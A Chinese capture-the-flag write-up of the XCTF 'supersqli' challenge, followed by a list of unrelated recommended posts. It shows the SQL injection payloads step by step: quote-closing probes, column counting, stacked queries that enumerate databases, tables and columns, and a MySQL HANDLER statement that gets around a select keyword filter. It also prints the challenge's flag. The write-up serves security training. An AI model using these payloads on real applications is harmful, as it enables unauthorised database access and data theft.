攻防世界——supersqli

一个SQL注入题

先判断是字符型还是数字型注入

字符型注入:需要闭合前面的引号,通常使用 ' 或 ",如 1'--+

数字型注入:不需要额外的引号闭合,直接添加条件即可

'1 and 1=1'

无报错

1 and 1=2

无报错

初步确定为字符型

  • and 1=1 (恒真条件):如果页面正常返回,说明SQL语句被执行了
  • and 1=2 (恒假条件):如果页面显示异常、空白或提示"无结果",表明应用程序对SQL结果有判断

1'--+

无报错

确定为字符型

对于字符型注入

  • 如果直接使用 1 and 1=1 而不闭合引号,可能两种情况都报错
  • 需要先闭合引号(如 1' and 1=1--+)才能看到正确反应

查询字段数

1' order by 3--+

报错了

1' order by 2--+

无报错

说明有两个字段

尝试联合查询(union)

显示select,update,delete,drop,insert,where,被正则过滤了

尝试堆叠查询

堆叠注入(Stacked Queries)指通过分号(;)连接多个SQL语句,使数据库依次执行的技术。其成功依赖于应用程序使用的数据库API是否支持多语句执行(如PHP的mysqli_multi_query()而非mysqli_query())。

  • 使用分号(;)作为语句分隔符

1';show databases--+

无报错

找到了5个数据库

根据题目提示,我们选择supersqli库

1';use supersqli;show tables--+

找到2个表

查找1919810931114514字段内容

?inject=1';use supersqli;show columns from `1919810931114514`--+

找到flag字段

数据库中查询以数字命名的字段或表要用单引号包裹起来

对于select的过滤

我们可以用handler查询来代替select查询

1';use supersqli;handler `1919810931114514` open as p;handler p read first--+

handler `1919810931114514` open as p; -- 以"句柄"方式打开表 `1919810931114514`,ps
handler p read first; -- 读取该表的首行数据

找到flag

复制代码
flag{c168d583ed0d4d7196967b28cbd0b5e9}
相关推荐
forEverPlume2 小时前
PHP怎么使用Eloquent Attribute Composition属性组合_Laravel通过组合构建复杂属性【方法】
jvm·数据库·python
2301_809204702 小时前
mysql在docker容器中如何部署_利用docker-compose快速启动
jvm·数据库·python
虹科网络安全2 小时前
艾体宝产品|深度解读 Redis 8.4 新增功能:原子化 Slot 迁移(上)
数据库·redis·bootstrap
阿坤带你走近大数据3 小时前
怎么查看当前oracle库下的表空间temp大小或者默认大小
数据库·oracle
yoyo_zzm3 小时前
Laravel8.x新特性全解析
数据库·nginx
码界奇点3 小时前
基于Python的新浪微博数据爬虫系统设计与实现
数据库·爬虫·python·毕业设计·新浪微博·源代码管理
我科绝伦(Huanhuan Zhou)4 小时前
探索技术世界:我的GitHub数据库工具宝库
数据库·github
猫的玖月5 小时前
(一)MY SQL概述
数据库·sql
2401_873479405 小时前
企业安全团队如何配合公安协查?IP查询在电子取证中的技术实践
tcp/ip·安全·网络安全·php
脑子进水养啥鱼?5 小时前
PostgreSQL .history 文件
数据库·postgresql